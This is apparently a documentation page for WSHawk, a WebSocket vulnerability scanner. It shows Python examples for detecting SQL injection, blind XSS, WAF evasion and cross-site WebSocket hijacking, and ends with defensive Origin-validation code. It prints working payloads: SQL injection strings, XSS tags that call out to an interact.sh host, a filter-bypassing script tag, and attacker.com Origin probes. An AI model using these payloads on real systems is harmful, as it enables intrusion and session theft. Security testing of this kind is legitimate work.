Execution Gallery

Real-World Scenarios

Battle-tested examples of how WSHawk identifies critical vulnerabilities in complex WebSocket environments.

SQL Injection in JSON Payload

Injection

Detecting blind SQL injection in a complex nested JSON WebSocket message.

```python
import asyncio
from wshawk.scanner_v2 import WSHawkV2

async def test_sql_injection():
    # Initialize scanner
    scanner = WSHawkV2("ws://api.target.com/v1/chat")

    # Message to inject into
    sample_msg = {
        "action": "search",
        "params": {
            "query": "laptop",
            "filter": "available"
        }
    }

    # Run targeted injection
    results = await scanner.message_analyzer.inject_and_test(
        await scanner.connect(),
        sample_msg,
        injection_type="sql"
    )

    # WSHawk automatically mutates 'query' field with:
    # ' OR 1=1--
    # " OR "1"="1
    # ') OR ('1'='1
    # sleep(5)--
    return results

# Drive the coroutine from synchronous code
asyncio.run(test_sql_injection())
```

OAST-Based Blind XSS Detection

XSS

Using interact.sh to detect out-of-band XSS execution in backend admin panels.

```python
from wshawk.scanner_v2 import WSHawkV2

async def test_blind_xss(url):
    # Enable OAST in scanner
    scanner = WSHawkV2(url)
    scanner.use_oast = True

    # WSHawk generates payloads like:
    # <script src="https://c72...j9.interact.sh"></script>
    # <img src=x onerror="fetch('https://c72...j9.interact.sh')">

    # The scanner polls the OAST provider for interactions
    await scanner.run_heuristic_scan()

    # If an admin views your message, WSHawk catches the callback:
    # [SUCCESS] OAST Interaction detected!
    # Source IP: 45.x.x.x
    # User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
```

Adaptive WAF Evasion

Evasion

Automatically learning from WAF responses to find bypass strategies.

```python
# Mutation engine uses feedback loop
from wshawk.payload_mutator import PayloadMutator, MutationStrategy

mutator = PayloadMutator()

# Initial payload gets blocked (403 Forbidden)
mutator.learn_from_response(
    payload="<script>alert(1)</script>",
    is_blocked=True
)

# Mutator recommends alternate strategy: CASE_VARIATION + COMMENT_INJECTION
strategy = mutator.get_recommended_strategy()
payloads = mutator.mutate_payload(
    "<script>alert(1)</script>",
    strategy,
    count=1
)

# Output: <sCrIpT /*--*/>alert(1)</sCrIpT>
```

Cross-Site WebSocket Hijacking (CSWSH)

Auth

Testing for missing Origin validation using headless browser simulation.

```python
async def check_cswsh(scanner):
    # scanner is an already constructed WSHawkV2 instance
    # Test for Origin bypass
    results = await scanner.test_origin_bypass()

    # WSHawk attempts connection with:
    # Origin: http://attacker.com
    # Origin: null
    # Origin: http://target.com.attacker.com

    if results['vulnerable']:
        print(f"CSWSH Detected! Accepted Origin: {results['origin']}")
    return results
```
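The server-side check that those three Origin probes exercise, as an added example that is not WSHawk code: a prefix match on the raw header accepts `http://target.com.attacker.com`, while an exact comparison of the parsed (scheme, host, port) tuple rejects all three. The allowlist value `http://target.com` and every function name here are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Assumed deployment value: the only origin allowed to open the socket.
ALLOWED_ORIGINS = {"http://target.com"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def normalize_origin(origin):
    """Return (scheme, host, port) for a serialized origin, or None if unusable."""
    if not origin or origin == "null":
        return None  # missing header, or an opaque origin (sandboxed frame, file://)
    try:
        parts = urlsplit(origin)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    # A genuine Origin header carries no userinfo, path, query or fragment.
    if "@" in parts.netloc or parts.path or parts.query or parts.fragment:
        return None
    if port is None:
        port = DEFAULT_PORTS[parts.scheme]
    return (parts.scheme, parts.hostname.lower(), port)


def naive_origin_ok(origin):
    """Weak check kept for contrast: prefix match on the raw header value."""
    return bool(origin) and any(origin.startswith(a) for a in ALLOWED_ORIGINS)


def strict_origin_ok(origin):
    """Exact match of the parsed origin tuple against the allowlist."""
    candidate = normalize_origin(origin)
    allowed = {normalize_origin(a) for a in ALLOWED_ORIGINS}
    return candidate is not None and candidate in allowed


if __name__ == "__main__":
    # The three probe origins listed above, plus the legitimate one and a missing header.
    probes = ["http://target.com", "http://attacker.com", "null",
              "http://target.com.attacker.com", None]
    for o in probes:
        print(f"{o!r:36} naive={naive_origin_ok(o)} strict={strict_origin_ok(o)}")
```

Run the strict check during the WebSocket handshake, before the upgrade is accepted, and close the connection when it returns False.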